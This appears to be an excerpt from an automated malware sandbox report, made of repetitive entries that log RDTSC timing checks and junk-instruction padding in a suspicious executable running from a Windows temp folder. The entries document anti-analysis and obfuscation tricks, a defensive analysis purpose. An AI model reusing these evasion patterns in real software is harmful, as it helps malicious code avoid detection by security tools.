Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: 9DDB05 second address: 9DDB0B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: 9DDB0B second address: 9DDB0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: A08F14 second address: A08F1C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: A08F1C second address: A08F20 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: A09080 second address: A0909D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F73D4C57615h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: A09255 second address: A09264 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edi 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: A09264 second address: A09268 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: A093E6 second address: A093ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: A093ED second address: A09401 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F73D4C5760Eh 0x00000009 push eax 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: A096D8 second address: A096DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: A12947 second address: A12975 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F73D4C57615h 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jbe 00007F73D4C57608h 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 pop edx 0x00000014 pushad 0x00000015 pushad 0x00000016 pushad 0x00000017 popad 0x00000018 push ecx 0x00000019 pop ecx 0x0000001a push ecx 0x0000001b pop ecx 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: A12EBC second address: A12EE4 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F73D4D0E046h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jnl 00007F73D4D0E046h 0x00000012 jmp 00007F73D4D0E056h 0x00000017 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: A12EE4 second address: A12F01 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F73D4C57613h 0x00000007 jnl 00007F73D4C57606h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: A12F01 second address: A12F12 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jo 00007F73D4D0E046h 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push ebx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: A12F12 second address: A12F30 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ebx 0x00000007 jmp 00007F73D4C57617h 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: A135FD second address: A13601 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: A13601 second address: A13607 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: A13607 second address: A13624 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F73D4D0E04Ch 0x0000000e jp 00007F73D4D0E056h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: A13624 second address: A13632 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F73D4C5760Ah 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: A13632 second address: A1363E instructions: 0x00000000 rdtsc 0x00000002 jo 00007F73D4D0E04Eh 0x00000008 push edx 0x00000009 pop edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: A138F2 second address: A13928 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F73D4C57618h 0x00000009 jns 00007F73D4C57606h 0x0000000f js 00007F73D4C57606h 0x00000015 popad 0x00000016 popad 0x00000017 pushad 0x00000018 pushad 0x00000019 jbe 00007F73D4C57606h 0x0000001f push ecx 0x00000020 pop ecx 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: A13928 second address: A13949 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ecx 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 jmp 00007F73D4D0E055h 0x0000000d pop ecx 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: A13949 second address: A1394F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: A13D35 second address: A13D39 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: A13D39 second address: A13D5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F73D4C57617h 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 pop eax 0x00000012 push ebx 0x00000013 pop ebx 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: A13D5F second address: A13D63 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: A13D63 second address: A13D6B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: A19FD5 second address: A19FD9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: A19FD9 second address: A19FE7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnc 00007F73D4C57608h 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: A1A5C1 second address: A1A5CA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: A1A8CB second address: A1A8D1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: A1A8D1 second address: A1A8E9 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F73D4D0E046h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F73D4D0E04Ah 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: A1A8E9 second address: A1A8ED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: A206AB second address: A206B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: A206B1 second address: A206C5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F73D4C57610h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: A206C5 second address: A206CB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: A206CB second address: A206CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: A2A1CD second address: A2A209 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 jns 00007F73D4D0E065h 0x0000000f jmp 00007F73D4D0E04Eh 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: A2A209 second address: A2A20E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: A2A20E second address: A2A218 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: A2A32C second address: A2A330 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: A2A330 second address: A2A347 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jmp 00007F73D4D0E051h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: A2A347 second address: A2A34C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: A2A34C second address: A2A352 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: A2A352 second address: A2A388 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F73D4C57606h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 jnc 00007F73D4C57606h 0x00000016 jmp 00007F73D4C5760Ch 0x0000001b pop eax 0x0000001c jmp 00007F73D4C57613h 0x00000021 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: A2A637 second address: A2A659 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 jl 00007F73D4D0E046h 0x0000000f pop esi 0x00000010 popad 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F73D4D0E04Ch 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: A2A659 second address: A2A65D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: A2A65D second address: A2A69D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F73D4D0E056h 0x00000007 jmp 00007F73D4D0E04Eh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push ecx 0x00000011 pop ecx 0x00000012 jmp 00007F73D4D0E054h 0x00000017 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: 9DD5D4 second address: 9DD62E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F73D4C57618h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jnc 00007F73D4C57616h 0x00000010 nop 0x00000011 xor di, 0C21h 0x00000016 push 00000004h 0x00000018 mov di, EE6Bh 0x0000001c nop 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 jmp 00007F73D4C57610h 0x00000025 jns 00007F73D4C57606h 0x0000002b popad 0x0000002c rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: A2B385 second address: A2B398 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jbe 00007F73D4D0E046h 0x0000000f push eax 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: 999E55 second address: 999E59 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: 999E59 second address: 999E5D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: A2EB0A second address: A2EB20 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F73D4C57606h 0x0000000a popad 0x0000000b push ecx 0x0000000c pushad 0x0000000d popad 0x0000000e pop ecx 0x0000000f pushad 0x00000010 push edi 0x00000011 pop edi 0x00000012 pushad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: A2EB20 second address: A2EB39 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pop edx 0x00000008 pushad 0x00000009 popad 0x0000000a pop eax 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f js 00007F73D4D0E046h 0x00000015 pushad 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: A2EB39 second address: A2EB54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F73D4C57606h 0x0000000a popad 0x0000000b jmp 00007F73D4C57610h 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: A2ECAD second address: A2ECB3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: A2ECB3 second address: A2ECB7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: A2ECB7 second address: A2ECC1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: A2EE24 second address: A2EE28 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: A2EE28 second address: A2EE2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: A2EE2E second address: A2EE34 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: A2EE34 second address: A2EE48 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F73D4D0E04Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: A2EE48 second address: A2EE4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: A2EE4E second address: A2EE52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: A2F0EA second address: A2F0EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: A2F0EE second address: A2F0F8 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F73D4D0E046h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: A2F0F8 second address: A2F104 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 push ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: A3283B second address: A3283F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: A3283F second address: A3286F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jnl 00007F73D4C57606h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007F73D4C5760Fh 0x00000011 pop edx 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F73D4C57612h 0x00000019 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: A3286F second address: A32887 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F73D4D0E053h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: A32887 second address: A3288D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: A3288D second address: A328B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F73D4D0E059h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: A328B1 second address: A328B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: A32C65 second address: A32C92 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F73D4D0E058h 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F73D4D0E04Dh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: A32C92 second address: A32C96 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: A32E2D second address: A32E33 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: A39338 second address: A39346 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jg 00007F73D4C57606h 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: A39346 second address: A39362 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jmp 00007F73D4D0E052h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: A39362 second address: A3937F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jnc 00007F73D4C57606h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F73D4C5760Ah 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: A3937F second address: A393B9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F73D4D0E051h 0x00000007 jns 00007F73D4D0E046h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F73D4D0E057h 0x00000016 jl 00007F73D4D0E046h 0x0000001c rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: A393B9 second address: A393BD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: A393BD second address: A393C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: A397BC second address: A397C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: A397C2 second address: A397DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F73D4D0E057h 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: A397DE second address: A397E6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: A397E6 second address: A397EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: A39E11 second address: A39E1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jnl 00007F73D4C57606h 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: A39E1E second address: A39E24 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: A39E24 second address: A39E29 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: A39E29 second address: A39E31 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: A39E31 second address: A39E42 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jbe 00007F73D4C5760Eh 0x0000000d push edx 0x0000000e pop edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
